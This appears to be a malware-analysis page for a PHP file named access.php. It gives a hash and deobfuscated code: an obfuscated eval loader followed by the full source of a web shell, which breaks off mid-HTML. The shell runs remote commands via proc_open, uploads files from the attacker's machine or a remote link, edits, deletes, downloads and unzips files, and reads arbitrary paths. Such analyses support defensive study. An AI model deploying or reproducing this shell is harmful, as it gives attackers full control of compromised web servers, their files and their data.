PHP Malware Analysis

access.php

md5: 5ad47502cb20f9ecc57040199135c12b

Jump to:

Screenshot


Attributes

Encoding

Environment

Execution

Files

Input

URLs


Deobfuscated PHP code

<?php

// Your code here!
$Cyto = "Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUPHJrNAEAWsA";
$Lix = "GwNnz+x/f4boLISCuXvM1peFbQsyXstZWAgPhPrMA+w/qLYnsaei5X1gW//ugChlBa4Wo3CBLuGR2yAH8gK7EbvLBI+oCLWKVp8nyWx3LIPqJ8deEphBvdNpvwyDcT1PydgrlGAWmMMgu0JjJEb/bAbD4Wu8QSYViComPrd3vOrd+3auzfr/Mx1+rS9vGu2q/ay369V5ttvmEjlfEhtTbEhwNWBvPZy47dTj9tVnqgo3QFuz+KQ56ZToialvsd8G/tjaxpw5VPHPU/xH3Nzsqw4RemlPUG3rWZg+SvuiTH+a6J0/6Fb+/jJB/bgBj8vMHbv9ZMm7unGxOeaQx5EIIG/8EXutB6+1+3xGng5Az4fw92PGYm4rk39XuoCYt3fzud9kPfqLV4tMvPYE4BtvtYo8LKfPu/soHZ98QhHjye8oqP9YFr+TYElqBRdOFTE4iCCov1uuUcMVqZSPzirhHK+IqCyUJhNoirQs8gD6UG7MOQGTeGirQ6LhMd2TFIMAygOuAsnbRDTBs4NCWE7iqrzoB1zDKszbU6DVlQ0TtwNnbXuMhn08kYF3n+vsiYT4F/dmbLwauXYihS8qq2SMwz2ULMM6KmCbVNqEWKcnUljjZNKNI3uqyCLoEOQ43sB4uTUfVWWM4Z75R/WntANJ52CcaDWePlZpJkby5xhtBTl15u15zAO3ZVWcIwkMmqH9NoEutMFlCg9rrqBxW//WF3d0g6EyciQ170Sx329K7njGd9rGbhyBOecesx+dTRmGkkanvNSAz/nHiPhZ+IO8Ccn8p+2R7T1TXe0ls+6EEEfSPIB/pvbKdJoD7OpfdMSZXwHZYtUJcCeC7CDvzAsJefG3+n3G5lhpG6veuNfwv8MaY+aEr19otOmkWdDmFTzVC/P3Shzvr3+mFYCZVy3D8P/6KZAnQR2phRaJlT+fOkSR4t/rFbDVR8lk1mnkCUvSmgY6eai99ryMVhr7UHITSY4mJmfm1KpvTv5bQ49aFI/YG70qSG7TpinNKgXNgaZML4r/fTvKwu1KXAJS71aIZ/i/eAch5Z3ltP8zbILuVZX7dPoH/psdIKLzz8OaeqBCklog1UuqohBmSyyIjeQr5tF5UHlzifuhbjn7W9uw83j4VapvQVRLwQyNropxHc8Je1Se4RAa3uIX6pgf6l4yNr847u42vgC4Aani2HsuoKf642zdO+LK579dUKmnHNF826n9trUQo5RXKIyFossOH6r0xWjrtqB9ABHb7jfBh1zofIihyVBYbdC9bopR7z1RBH46iqhN17lSTHCZUZgTUFWfPu+978jwMSDYrQt6sUlKCYvZwLgKGZ/Sq7U4UMdDGC9VBzrkRbSn6r/NtjfhF5cdPbfoZVSCwNoqW0oxyOU02MDXYv5W3FbQg56/FRQw8a44SFV+xFTFechi4dWdjpYT3TRjbO5Ynqo67I2aTyYEpWdjmvD3BnmnAEpo8UbPmiFq4XV46ocyzuFg/6BzuKTTxkPk5dp1FSHL1lms2qcoWmZULjWujzZRdaKFeg4nf/dyFnenjWChb+ycNh1TgQWtIxvDs1PjalabVbp0o2exSisvsMeFFOmtUuxnNhSBL6uwZv7cxr7/ePblgs9HuvKxVw2asHBoFk2A737RQIz/29wyEnneYf88xab1x6moW1M60fKcCnw23upOJcbY3OxSOucQl1ygGavaBRhstdjH25xYOZPfywTzRZfuKS7ZcZTKuKTM8AanaFYIVUtYAXxnlOr5ZSo2GRJStMBQQt1Whd2VjuqiFIpWWwz9CrsgiiQHvel0eQ4MaG5ABvBvnhYfwWW1PWCYqvl7vVdhgIivU9BehB2hUTcrO6Pf41b+d+ACe3zJJS2lEgKM6vUspPWqQLZaWCuaoFMVBaZOQantpso0WEoo6yCq74dZseZLTVyPma9KWOUXLVkmjGU0r1FMvPSL9DyVna6reYI/xx9MYNTJsVIut8NBayUvR8BhCXgqAA64SPZT7BeHWkibcCsvKBI+XuQ+WZqHYdYcjmJzbLq2bE+SJu6fC6cq9R0GFrtKutCr4ZcudXFxY7+Ml9GuajVjQzEpjxSBPGTLY4PGB+bzmisKUPwq9zxNBRF7qXFpqS98NWAnGSFfZQHq5ZOQDFkeO/Ab+xLJL+vzoSqu54Z0h0kckz9Rpy6JdQymJeh7xbEjIfsnrMnVgsWX4ZG9bpcieZESvahqH1HXIOTrWQB8WpJvp6600W4otrE6psC3X50XfReJLbwrGTLN3Zqlo3ulK+5t6SRQZGEExfHkbI+Msg/wlI6noTsDwtRJ+1He66r2eZL+Kgp01G/i6WztL0z12LkVqiEsiDBwUh6GX9HtU0Sg/iNFNVLsmWd3wPldD9M4JY46zuYfWUZBi5GUVMmiJMKnQpg6KHLxDi11KDfcHxp1x+hjNWj96IzVHPZP2+Syh6WC1GL1vmYpFji1t45cKJzj7q2bLX5UmLLjkEOGNLXUdZwDGXjwYi3YRhLEm/MECQ91puSD6ujEXTFyZZakkKPTc5cJpadRq4etbPGeQDKfouglxy/AMvSD0a7YkDndD9n2ep0wI/TP0TT8yT80vkl42Kr7aWhmoDcqj3SnOoL/VjZlZ3W1bwOhUlbO/+lTtgkFguDWsYpenHxxx1Lob6xC2zInhDZCjFzCpqQvs5plsfLRC0cQwuVmBnrP8IGWTRu6P3QJp39W6ybebXXuSp8gcbL+6/yh82AJecW6F3iCFpPJjPmqg0estareXO6CrTorDjjRPdS0IPbVG9fHrneNZF7Wp2/PPXIxIEt/7coBPO+ssyMKKKuRg2kd4rxnkpBNDs1YnS9f4at+PWxR+2xlVGh9khrJLTEdEXwArCoCGQkZCc60Jb7w8R8/ZgOJSBJwiiv8x7NDKZiswueF0EamScAUqTd5OOZWogJeJsfHnAtBKDQlahus0T2aEOENng1BfY3eGvi8IvwV71n2vr8bZUXA0urHQShS5CnHQLxVJ36sPZ0pGO9lpC/82aDlTNN3e/XSVASLQMYBaKNF6rCDluoBwj/1nHfJV1FxbOsuGP2Wdos3x7VXf2pZQuimscLBkf1/tPokW8RCvGiri4I/fYiQiMYwlwZ8Tcf4Mpg/DP/PkO9zXnoWOh4ilKnd//JxR9d/PQdwsALmjKm/73pmVt/sJBYVNYlnd2JnYii6YZXte7s1Ljl5Q+fLzMXI0Q3A/m+1s8nlluFZhag///ireDhWvYDRG6oyneC1F9Y8WBJC/k+Bxer2iLJW/kszfO/3q0ttLJATrdZEaXXaiQtIkC0B0ktnBzTuvJ58LZ7n/FcbZf4cai3iFjuWmx6Uu6Vaa5kLfcu60zu8m7zkT7aukRtqphEjZ/pkCVq8WKIh6Tk6sbv8xB3nLF52KXS+HUs9foRWD/EJwWEbyhYgRiyWEkaIT+pXCh1tgfpCLg4BUr4rmYbqEpZt4GIagpzwCogh+qg2og+OWhQWmiVLFJZH0KFnFVTt0t9aqmWZXPnLxGNcw7/GpkGRbApOzj9xRdlZqLR/wimUldlksVMBOA1MLDM9ZE+EbINCDaWAJMQvnL7i4CZ/iUhsSMiEwZHXM7Ryq8XkdG6piPF81W3yoCVKNntndl1n+BA49n8snt/kH889mUGsGPXAGWyDKI6FsFg7UETkfK2R8STkeAh4ajXs6/zDzoUu+g2nYZZ4WMsYfAd7I/VkiPFrPBusDF8ijfAEN1mdm8DjVaIXPjnX1jgsYQRJlJY7CJsXYoAFmLrOaV6CJKvPMnUPFM8cF5ZDPLj1dZL1EQDI3mzKoVPq21sgmi40A80bP098ToFual9sKJCxgkB50+1Hc8zp+EipFRqpDxX1PIpyxlf7QKdW2KbKimoGAk9B9G3ZtgJE2qMn+K+OCvTS0cBc0ov5j10UY7mZsktB4jHXt98+Z3hKRfCARVV+SknKckbafCO7eOQG/CG+W9QD7VBYYVZi2NbM7XxqybMjA6c5KTA0XSmE+p24h1GGbRqqLpPbsHcWrdw5JvUkzaDAUhlmHXaVKyW88Z04JrJTELi5eSjpRR2yPUZigmhhFi5oOReSL4mo+AuOYe5bHweE3hngXaXf5IYn2uZAjCE6P0bCeRGDoy7dJM0sw3MT3T6uSwItLXCmtKZLR+o6MO4KEZINdm1JH6Ki+9on6/1dLJD6jCfaRaTGwA5UfawxiED0g9tZRMnGkjEOApCGwNa7QPDouhXgVhIMyzi44Vmn7XJeoaUPfTNL2ZZaYD3UAA1w15XB1A4yVBSueVAROREEZFnuFexTgQY7LxwJI3UkKu8hTAW1i5tFbgvKSbKD5XBJp4i3EOP81MGTDpOeDmgeNzzyk0j/ClxDZRTBnBFZGqCq99Yu7EtqbzhHFKbETZ0ZsJ7N4soD4hRNgVmmnUAWoM2TY3eFyuMImNEkjdzI2DnndRCEHfKknTVFKbCsUIVWPLEMuSC5vxz5wnpj0rZUrYvOLpTlF2PzP7Jc6ilnGlShD9+JS3n+JYP6FqFOkXGGhJ6vzAMODPG+gJselQA5Ekvi1wZVvEGyQ6hXbfFtVveFQ3wzMOUy8flpl6cq8rqaGUzuhdxFEwSJVGm2cuTUAHHRO0IDNnwlIkJqCWVz2IMFAv4wpeAAfQ0rrL/Q4iQjaITUw36QTry3mzTQCdESuAuFAFZVDNdxGepUFHGT7Co2pl0dgNAaW+kuTcz/FnalZndxpv6uJ3u/1H9QtFncx5vLP9yTinWnMpMKSq8gGVpvrUISSvYNNWTUMgJD/7B0xS46pG6JWiVTy8KhOG5t+USX6cWS5bTFlfHagC/qUp+pkAIVJcI1R3NE+5yZ50k9W0cMb3FXd+707sjKC+prcWiG5fudcRpqWI8+d/5llwL1kO7RZLlYCIi7hRQKSH1FvABBhZHK4n+YPqYOnBYYxkhtStQCWEKY1Kyd7tzveYtbNCbGQorEDD0InrlFqLkjrfWGspjT/BmQUrepTRYoMahOKJ4nQ3/LWGmRi+pn7cT74jjW+GzkMYSmoI5S4w5ASC7lwTT2vYeay+OuE7lP9PAPl9RGsY7UHDqlH1wvAD9i98O/428g/BhOInO08UfMEYBTyBg1HFucYpFMyyzbxxmIwDw/BHC87cCi4b95s+Y7QX0iZOxahUXOQeJmvBctD7yRVr05CxuQQ0g91TH/WO0DH3lWMGt6ptYGsGSInjE4jfaG6rI6U0QPxbpAsXtdC5AoF4jiIaaKucYX5sHFHPQnylJBwmirawiBH711r/46wDcSZXWuezUJzL3LNUxdjZ7ON/Z3PO0rmp5AH1C2zYL88vENza+krqOmXyGIuSqBvSqa6eHFxpj7EnM719ZgGPZigTEZjXJFUR1igCtP0JMm8EqlTFvconn5fbQc5fMYPqaF9dUaRh7cqh1vKj7+NFJFLzjk4jCi4IfXgv/nzuUwKTdbiSrYIGFRJ95xTWKn/eECBLNzQvSaeSnh0NhOqVzo55U2mtioJqK285INxpD61V0tpXaDGmep5m8l4MdeyDYVvJ1pwLS+PTiO5lv6SUPAPNG6LrHTQO94TbSi0cNbcDcWNtNPj/w1pAaLb+mANirEO1sVgaFKYFV+aKRjMjXrF6tYS3meheH2rHOSev9SnFQv2FD9SQZLmSrq8lJhSxQaGapFQENVQj+sNnAXA7hZohhxNj9cCEYlKAjkbMy/SJMcUzwGeDVBbzfwwJ3wH7ff/FSa9cPpzKOq/CLLAiZK2EM6/nQDezYJbqNgW90Ff7OZG+MKrD6L0JS2pauMK/CE/DI344YpkUBgzOaMWNq9EkcQvXgqwLn/P88+abQ2k+ZudS9aYB9fCrcTDuo/FDu46DyaKEFLPIqLZwikZR675XhrEudkvHoRSaGAsD2xJaknD4kmYv1EzcJy9i4PaTOSvNkyks9tBrJwd6eos0L8D0f87vHJxwWvyTL4JOKMBR0m8Ow52xmV2zxOg04+95DoPw/czv/v+9wdw/EfBNsVLS9FLZd1PkMM/UPJzHnLW7TciNEISMn4Qfk/dCXaGLj3eMW8g8ywdr9npeUHeArfX6kf7DZMceK7oBcbRbE3qLXkMa1xBdikyoEOLrvXeU6PxnlGGnLS68RpciAN6TNgnNQvd+s+Jjm0FT3eJdwP0OL+f4L9fR/+tshjhRzBbytoNcsU/Guev/bYTvILLigma6m+weByH/FgyY8ClC46mVZkCKMSyic+wGJZ3dI4GhzfOPWEubMSB1yhtk9kbh8sHh5lYjYW/74bupPyZXIjC3IxYRZQGdOrWGMbs2okpnAKLXyofG4JBruM8R1c+9txMYbRQ+Jn/e1VzO+kRj8uetXPeeNnaN5IqYenyqIAsg1Asf+vv9ejRzEPQRgCIWagsEOqpOjcKVqt5OuUYxJZKtldJnCBURuGiWzh8n5mfWrxbP3a80Mn41uJSkdA";
echo var_dump("eval('?>'.gzuncompress(gzinflate(base64_decode(strrev(\$Lix)))));");
echo var_dump("<!DOCTYPE html>\r\n<html>\r\n<head>\r\n    <meta name=\"theme-color\" content=\"#1f1f1f\">\r\n</head>\r\n<body bgcolor=\"#1f1f1f\" text=\"#ffffff\">\r\n<link href=\"\" rel=\"stylesheet\" type=\"text/css\">\r\n<link href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css\" rel=\"stylesheet\">\r\n<style>\r\n    @import url('https://fonts.googleapis.com/css?family=Dosis');\r\n    @import url('https://fonts.googleapis.com/css?family=Bungee');\r\nbody {\r\n    font-family: \"Dosis\", cursive;\r\n    text-shadow:0px 0px 1px #757575;\r\n}\r\n\r\nbody::-webkit-scrollbar {\r\n  width: 12px;\r\n}\r\n\r\nbody::-webkit-scrollbar-track {\r\n  background: #1f1f1f;\r\n}\r\n\r\nbody::-webkit-scrollbar-thumb {\r\n  background-color: #1f1f1f;\r\n  border: 3px solid gray;\r\n}\r\n\r\n#content tr:hover {\r\n    background-color: #636263;\r\n    text-shadow:0px 0px 10px #fff;\r\n}\r\n\r\n#content .first {\r\n    background-color: #25383C;\r\n}\r\n\r\n#content .first:hover {\r\n    background-color: #25383C\r\n    text-shadow:0px 0px 1px #757575;\r\n}\r\n\r\ntable {\r\n    border: 1px #000000 dotted;\r\n    table-layout: fixed;\r\n    word-break: break-all;\r\n}\r\n\r\ntextarea {\r\n    max-width: 95%;\r\n    max-height: 100%;\r\n    resize: none;\r\n    outline: none;\r\n    overflow: auto;\r\n    background: transparent;\r\n    color: #fff;\r\n}\r\n\r\ntextarea::-webkit-scrollbar {\r\n  width: 12px;\r\n}\r\n\r\ntextarea::-webkit-scrollbar-track {\r\n  background: #1f1f1f;\r\n}\r\n\r\ntextarea::-webkit-scrollbar-thumb {\r\n  background-color: #1f1f1f;\r\n  border: 3px solid gray;\r\n}\r\n\r\na {\r\n    color: #ffffff;\r\n    text-decoration: none;\r\n}\r\n\r\na:hover {\r\n    color: gold;\r\n    text-shadow:0px 0px 10px #ffffff;\r\n}\r\n\r\ninput,select,textarea {\r\n    border: 1px #000000 solid;\r\n    -moz-border-radius: 5px;\r\n    -webkit-border-radius:5px;\r\n    border-radius:5px;\r\n}\r\n\r\n.gas {\r\n    background-color: #1f1f1f;\r\n    color: #ffffff;\r\n    cursor: pointer;\r\n}\r\n\r\nselect {\r\n    background-color: transparent;\r\n    color: #ffffff;\r\n}\r\n\r\nselect:after {\r\n    cursor: pointer;\r\n}\r\n\r\n.linka {\r\n    background-color: transparent;\r\n    color: #ffffff;\r\n}\r\n\r\n.up {\r\n    background-color: transparent;\r\n    color: #fff;\r\n}\r\n\r\noption {\r\n    background-color: #1f1f1f;\r\n}\r\n\r\n::-webkit-file-upload-button {\r\n  background: transparent;\r\n  color: #fff;\r\n  border-color: #fff;\r\n  cursor: pointer;\r\n}\r\n</style>\r\n<script>\r\nfunction setfilename(val)\r\n  {\r\n    filename = val.split('\\\\').pop().split('/').pop();\r\n    //filename = filename.substring(0, filename.lastIndexOf('.'));\r\n    document.getElementById('namanya').value = filename;\r\n  }\r\n\r\nasync function loadFile(file) {\r\n    let text = await file.text();\r\n    document.getElementById(\"bepasdata\").innerHTML = text;\r\n}\r\n</script>\r\n<center>\r\n<font face=\"Bungee\" size=\"5\"></font></center>\t\r\n<table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr><td>\r\n<?php\r\nset_time_limit(0);\r\nerror_reporting(0);\r\n\r\n\$disfunc = @ini_get(\"disable_functions\");\r\nif (empty(\$disfunc)) {\r\n    \$disf = \"<font color='gold'>NONE</font>\";\r\n} else {\r\n    \$disf = \"<font color='red'>\".\$disfunc.\"</font>\";\r\n}\r\n\r\nfunction author() {\r\n    echo \"<center><br></center>\";\r\n    exit();\r\n}\r\n\r\nfunction cekdir() {\r\n    if (isset(\$_GET['path'])) {\r\n        \$lokasi = \$_GET['path'];\r\n    } else {\r\n        \$lokasi = getcwd();\r\n    }\r\n    if (is_writable(\$lokasi)) {\r\n        return \"<font color='green'>Writeable</font>\";\r\n    } else {\r\n        return \"<font color='red'>Writeable</font>\";\r\n    }\r\n}\r\n\r\nfunction cekroot() {\r\n    if (is_writable(\$_SERVER['DOCUMENT_ROOT'])) {\r\n        return \"<font color='green'>Writeable</font>\";\r\n    } else {\r\n        return \"<font color='red'>Writeable</font>\";\r\n    }\r\n}\r\n\r\nfunction xrmdir(\$dir) {\r\n    \$items = scandir(\$dir);\r\n    foreach (\$items as \$item) {\r\n        if (\$item === '.' || \$item === '..') {\r\n            continue;\r\n        }\r\n        \$path = \$dir.'/'.\$item;\r\n        if (is_dir(\$path)) {\r\n            xrmdir(\$path);\r\n        } else {\r\n            unlink(\$path);\r\n        }\r\n    }\r\n    rmdir(\$dir);\r\n}\r\n\r\nfunction dunlut(\$file) {\r\n    if (!is_readable(\$file)) {\r\n        red(\"Cannot Download File / Unreadable File !\");\r\n        die();\r\n    }\r\n    header('Content-Description: File Transfer');\r\n    header('Content-Type: application/octet-stream');\r\n    header('Content-Disposition: attachment; filename=\"'.basename(\$file).'\"');\r\n    header('Expires: 0');\r\n    header('Cache-Control: must-revalidate');\r\n    header('Pragma: public');\r\n    header('Content-Length: ' . filesize(\$filepath));\r\n    flush();\r\n    readfile(\$file);\r\n    die();\r\n}\r\n\r\nfunction owner(\$file) {\r\n    if (function_exists(\"posix_getpwuid\")) {\r\n        \$tod = @posix_getpwuid(fileowner(\$file));\r\n        return \"<center>\".\$tod['name'].\"</center>\";\r\n    } else {\r\n        return \"<center>\".fileowner(\$file).\"</center>\";\r\n    }\r\n}\r\n\r\nfunction cekwrite(\$lokasi) {\r\n    \$izin = substr(sprintf('%o', fileperms(\$lokasi)), -4);\r\n    if (is_writable(\$lokasi)) {\r\n        return \"<font color=green>\".\$izin.\"</font>\";\r\n    } else {\r\n        return \"<font color=red>\".\$izin.\"</font>\";\r\n    }\r\n}\r\n\r\nfunction ekse(\$komend, \$lokasi) {\r\n    if (!function_exists(\"proc_open\")) {\r\n        die(\"proc_open function disabled !\");\r\n    } elseif (!function_exists(\"base64_decode\")) {\r\n        die(\"base64_decode function disabled !\");\r\n    }\r\n    \$komen = base64_decode(base64_decode(base64_decode(\$komend)));\r\n    \$tod = @proc_open(\$komen, array(0 => array(\"pipe\", \"r\"), 1 => array(\"pipe\", \"w\"), 2 => array(\"pipe\", \"r\")), \$pipes, \$lokasi);\r\n    echo \"<textarea rows='25' cols='100'>\".htmlspecialchars(stream_get_contents(\$pipes[1])).\"</textarea><br><br>\";\r\n}\r\n\r\nfunction ipserv() {\r\n    if (empty(\$_SERVER['SERVER_ADDR'])) {\r\n        return gethostbyname(\$_SERVER['SERVER_NAME']);\r\n        if (empty(gethostbyname(\$_SERVER['SERVER_NAME']))) {\r\n            return \$_SERVER['SERVER_NAME'];\r\n        }\r\n    } else {\r\n        return \$_SERVER['SERVER_ADDR'];\r\n    }\r\n}\r\n\r\nfunction cekfile(\$file) {\r\n     return '<i class=\"fa fa-file\" style=\"color: #d6d4ce\"></i> ';\r\n}\r\n\r\nfunction filedate(\$file) {\r\n    return date(\"F d Y g:i:s\", filemtime(\$file));\r\n}\r\n\r\nfunction unzip(\$file, \$lokasi) {\r\n    if (!is_readable(\$file)) {\r\n        red(\"Cannot Unzip File / Unreadable File !\");\r\n        die();\r\n    } elseif (strpos(file_get_contents(\$file), \"\\x50\\x4b\\x03\\x04\") === false) {\r\n        red(\"This isn't Zip File !\");\r\n        die();\r\n    }\r\n    \$zip = new ZipArchive;\r\n    \$res = \$zip -> open(\$file);\r\n    if (\$res == true) {\r\n        \$zip -> extractTo(\$lokasi);\r\n        \$zip -> close();\r\n        green(\"Success Unzip File !\");\r\n    } else {\r\n        red(\"Failed to Unzip File !\");\r\n    }\r\n}\r\n\r\nfunction green(\$text) {\r\n    echo \"<center><font color='green'>\".\$text.\"</center></font>\";\r\n}\r\n\r\nfunction red(\$text) {\r\n    echo \"<center><font color='red'>\".\$text.\"</center></font>\";\r\n}\r\n\r\necho \"Server IP : <font color=gold>\".ipserv().\"</font> &nbsp;/&nbsp; Your IP : <font color=gold>\".\$_SERVER['REMOTE_ADDR'].\"</font><br>\";\r\necho \"Web Server : <font color='gold'>\".\$_SERVER['SERVER_SOFTWARE'].\"</font><br>\";\r\necho \"System : <font color='gold'>\".php_uname().\"</font><br>\";\r\necho \"User : <font color='gold'>\".@get_current_user().\"&nbsp;</font>( <font color='gold'>\".@getmyuid().\"</font>)<br>\";\r\necho \"PHP Version : <font color='gold'>\".@phpversion().\"</font><br>\";\r\necho \"Disable Function : \".\$disf.\"</font><br>\";\r\necho \"MySQL : \";\r\nif (function_exists(\"mysql_connect\")) {\r\n    echo \"<font color=green>ON</font>\";\r\n} else {\r\n    echo \"<font color=red>OFF</font>\";\r\n}\r\necho \" &nbsp;|&nbsp; cURL : \";\r\nif (function_exists(\"curl_init\")) {\r\n    echo \"<font color=green>ON</font>\";\r\n} else {\r\n    echo \"<font color=red>OFF</font>\";\r\n}\r\necho \" &nbsp;|&nbsp; WGET : \";\r\nif (file_exists(\"/usr/bin/wget\")) {\r\n    echo \"<font color=green>ON</font>\";\r\n} else {\r\n    echo \"<font color=red>OFF</font>\";\r\n}\r\necho \" &nbsp;|&nbsp; Perl : \";\r\nif (file_exists(\"/usr/bin/perl\")) {\r\n    echo \"<font color=green>ON</font>\";\r\n} else {\r\n    echo \"<font color=red>OFF</font>\";\r\n}\r\necho \" &nbsp;|&nbsp; Python : \";\r\nif (file_exists(\"/usr/bin/python2\")) {\r\n    echo \"<font color=green>ON</font>\";\r\n} else {\r\n    echo \"<font color=red>OFF</font>\";\r\n}\r\n\r\nforeach(\$_POST as \$key => \$value){\r\n    \$_POST[\$key] = stripslashes(\$value);\r\n}\r\n\r\nif(isset(\$_GET['path'])){\r\n    \$lokasi = \$_GET['path'];\r\n    \$lokdua = \$_GET['path'];\r\n} else {\r\n    \$lokasi = getcwd();\r\n    \$lokdua = getcwd();\r\n}\r\n\r\n\$lokasi = str_replace('\\\\','/',\$lokasi);\r\n\$lokasis = explode('/',\$lokasi);\r\n\$lokasinya = @scandir(\$lokasi);\r\n\r\necho \"<br>Directory (\".cekwrite(\$lokasi).\") : &nbsp;\";\r\n\r\nforeach(\$lokasis as \$id => \$lok){\r\n    if(\$lok == '' && \$id == 0){\r\n        \$a = true;\r\n        echo '<a href=\"?path=/\">/</a>';\r\n        continue;\r\n    }\r\n    if(\$lok == '') continue;\r\n    echo '<a href=\"?path=';\r\n    for(\$i=0;\$i<=\$id;\$i++){\r\n    echo \"\$lokasis[\$i]\";\r\n    if(\$i != \$id) echo \"/\";\r\n} \r\necho '\">'.\$lok.'</a>/';\r\n}\r\n\r\necho '</td></tr><tr><td>';\r\nif (isset(\$_POST['upwkwk'])) {\r\n    if (\$_POST['dirnya'] == \"2\") {\r\n            \$lokasi = \$_SERVER['DOCUMENT_ROOT'];\r\n        }\r\n    if (isset(\$_POST['berkasnya'])) {\r\n        \$data = @file_put_contents(\$lokasi.\"/\".\$_FILES['berkas']['name'], @file_get_contents(\$_FILES['berkas']['tmp_name']));\r\n        if (file_exists(\$lokasi.\"/\".\$_FILES['berkas']['name'])) {\r\n            echo \"File Uploaded ! &nbsp;<font color='gold'><i>\".\$lokasi.\"/\".\$_FILES['berkas']['name'].\"</i></font><br><br>\";\r\n        } else {\r\n            echo \"<font color='red'>Failed to Upload !<br><br>\";\r\n        }\r\n    } elseif (isset(\$_POST['linknya'])) {\r\n        if (empty(\$_POST['namalink'])) {\r\n            exit(\"Filename cannot be empty !\");\r\n        }\r\n        if (\$_POST['dirnya'] == \"2\") {\r\n            \$lokasi = \$_SERVER['DOCUMENT_ROOT'];\r\n        }\r\n        \$data = @file_put_contents(\$lokasi.\"/\".\$_POST['namalink'], @file_get_contents(\$_POST['darilink']));\r\n        if (file_exists(\$lokasi.\"/\".\$_POST['namalink'])) {\r\n            echo \"File Uploaded ! &nbsp;<font color='gold'><i>\".\$lokasi.\"/\".\$_POST['namalink'].\"</i></font><br><br>\";\r\n        } else {\r\n            echo \"<font coloe='red'>Failed to Upload !<br><br>\";\r\n        }\r\n    } elseif (isset(\$_POST['bepas'])) {\r\n        \$bepasdata = \$_POST['bepasdata'];\r\n        \$bepasnama = \$_POST['bepasnama'];\r\n        if (\$bepasdata) {\r\n            echo \"string\";\r\n        }\r\n        @file_put_contents(\$lokasi.\"/\".\$bepasnama, \$bepasdata);\r\n        if (file_exists(\$lokasi.\"/\".\$bepasnama)) {\r\n            echo \"File Uploaded ! &nbsp;<font color='gold'><i>\".\$lokasi.\"/\".\$bepasnama.\"</i></font><br><br>\";\r\n        } else {\r\n            echo \"<font coloe='red'>Failed to Upload !<br><br>\";\r\n        }\r\n    }\r\n}\r\n\r\necho \"</table><br>\";\r\necho '<table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">';\r\necho '<th>[ &nbsp;<a href=\"'.\$_SERVER['SCRIPT_NAME'].'\">Home</a>&nbsp; ]</th>';\r\necho '<th>[ &nbsp;<a href=\"?path='.\$lokasi.'&komend=gaskan\">C0mmand</a>&nbsp; ]</th>';\r\necho '<th>[ &nbsp;<a href=\"?path='.\$lokasi.'&upload=gaskan\">Upload File</a>&nbsp; ]</th>';\r\necho \"</table><br>\";\r\n\r\nif (isset(\$_GET['fileloc'])) {\r\n    echo \"<tr><td>Current File : \".\$_GET['fileloc'];\r\n    echo '</tr></td></table><br/>';\r\n    echo \"<pre>\".htmlspecialchars(file_get_contents(\$_GET['fileloc'])).\"</pre>\";\r\n    author();\r\n} elseif (isset(\$_GET['pilihan']) && \$_POST['pilih'] == \"hapus\") {\r\n    if (is_dir(\$_POST['path'])) {\r\n        xrmdir(\$_POST['path']);\r\n        if (file_exists(\$_POST['path'])) {\r\n            red(\"Failed to delete Directory !\");\r\n        } else {\r\n            green(\"Delete Directory Success !\");\r\n        }\r\n    } elseif (is_file(\$_POST['path'])) {\r\n        @unlink(\$_POST['path']);\r\n        if (file_exists(\$_POST['path'])) {\r\n            red(\"Failed to Delete File !\");\r\n        } else {\r\n            green(\"Delete File <i>\".basename(\$_POST['path']).\"</i> Success !\");\r\n        }\r\n    }\r\n} elseif (isset(\$_GET['pilihan']) && \$_POST['pilih'] == \"gantinama\") {\r\n    if (isset(\$_POST['gantin'])) {\r\n        \$ren = @rename(\$_POST['path'], \$_POST['newname']);\r\n        if (\$ren == true) {\r\n            green(\"Change Name Success !\");\r\n        } else {\r\n            red(\"Change Name Failed !\");\r\n        }\r\n    }\r\n    if (empty(\$_POST['name'])) {\r\n        \$namaawal = \$_POST['newname'];\r\n    } else {\r\n        \$namawal = \$_POST['name'];\r\n    }\r\n    echo \"<center>\".\$_POST['path'].\"<br>\";\r\n    echo '<form method=\"post\">\r\n    New Name : <input name=\"newname\" type=\"text\" class=\"up\" size=\"20\" value=\"'.\$namaawal.'\" />\r\n    <input type=\"hidden\" name=\"path\" value=\"'.\$_POST['path'].'\">\r\n    <input type=\"hidden\" name=\"pilih\" value=\"gantinama\">\r\n    <input type=\"submit\" value=\"Change\" name=\"gantin\" class=\"up\" style=\"cursor: pointer; border-color: #fff\"/>\r\n    </form>';\r\n} elseif (isset(\$_GET['pilihan']) && \$_POST['pilih'] == \"edit\") {\r\n    if (isset(\$_POST['gasedit'])) {\r\n        \$edit = @file_put_contents(\$_POST['path'], \$_POST['src']);\r\n        if (\$edit == true) {\r\n            green(\"Edit File Success !\");\r\n        } else {\r\n            red(\"Edit File Failed !\");\r\n        }\r\n    }\r\n    echo \"<center>\".\$_POST['path'].\"<br><br>\";\r\n    echo '<form method=\"post\">\r\n    <textarea cols=80 rows=20 name=\"src\">'.htmlspecialchars(file_get_contents(\$_POST['path'])).'</textarea><br>\r\n    <input type=\"hidden\" name=\"path\" value=\"'.\$_POST['path'].'\">\r\n    <input type=\"hidden\" name=\"pilih\" value=\"edit\">\r\n    <input type=\"submit\" value=\"Edit File\" name=\"gasedit\" />\r\n    </form><br>';\r\n} elseif (isset(\$_GET['pilihan']) && \$_POST['pilih'] == \"dunlut\") {\r\n    dunlut(\$_POST['path']);\r\n} elseif (isset(\$_GET['pilihan']) && \$_POST['pilih'] == \"unzip\") {\r\n    unzip(\$_POST['path'], \$lokasi);\r\n} elseif (\$_REQUEST['upload'] == \"gaskan\") {\r\n    echo \"<center>Upload File : \";\r\n    echo '<form enctype=\"multipart/form-data\" method=\"post\">\r\n<input type=\"radio\" value=\"1\" name=\"dirnya\" checked>current_dir [ '.cekdir().' ]\r\n<input type=\"radio\" value=\"2\" name=\"dirnya\" >document_root [ '.cekroot().' ]\r\n<br>\r\n<input type=\"hidden\" name=\"upwkwk\" value=\"aplod\">\r\n<input type=\"file\" name=\"berkas\"><input type=\"submit\" name=\"berkasnya\" value=\"Upload\" class=\"up\" style=\"cursor: pointer; border-color: #fff\"><br><br>\r\nUpload File From Link :<br>\r\n<input type=\"text\" name=\"darilink\" class=\"up\" placeholder=\"https://anon7.xyz/upload.txt\">&nbsp;<input type=\"text\" name=\"namalink\" class=\"up\" size=\"3\" 